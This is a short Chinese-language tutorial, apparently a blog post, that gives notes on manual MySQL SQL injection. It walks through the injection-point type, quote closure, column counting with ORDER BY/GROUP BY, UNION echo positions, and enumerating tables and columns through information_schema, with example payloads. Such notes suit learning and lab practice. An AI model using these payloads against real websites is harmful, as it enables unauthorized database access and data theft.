sql注入


提示:


方法

 -  select database()				#所在数据库
 -  select user()					# root@localhost
 -  select version()				#mysql 版本
 -  select @@datadir               #mysql 所在路径   
 -  select @@version_compile_os    #所在系统

1.注释三种方式

--+ 
#
%23

————执行过程————

  1. 查看注入点类型 数字还是字符串
  2. 查看有几列
  3. 查看回显位
  4. 查库里面有几张表
    在这里插入图片描述

一,查看注入点类型 数字还是字符串

例子:

test?id=1 and 1=2

如果是数字型 就会报错 因为 1不等于 2
and :同时满足

2.字符串需要查看闭合方式

' 单引号
" 双引号
')单引号 + 括号
")双引号 + 括号

二,查看有几列

两种方式

  • order by 2 --+
  • group by 2 --+
order by 2  --+   # 
group by 2 --+   # order by 不能用的时候 可以越过防火强

三,查看回显位 union

/?id=-1'  union select 1,2,3 --+

1.让前面id = -1(负一) 查询失败后 2. 就可以返回 union 后面的值

四,查一个库下面有几张表+几个列

先查表 在查列

  1. information_schema.columns 存放的是 所有库+表内列的名称
  2. table_schema 存放的是库名称
  3. table_name 存放的是表名称
  4. column_name 存放的是列名称

1.查当前库下面有几张表

(select group_concat(table_name) from information_schema.tables where table_schema = database())

例子

select 1,(select group_concat(table_name) from information_schema.tables where table_schema = database()),3 --+

2.查询表里面有几个列

(select group_concat(column_name ) from information_schema.columns where table_name = 'users')

例子

select 1,((select group_concat(column_name ) from information_schema.columns where table_name = ‘users’),3 --+


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值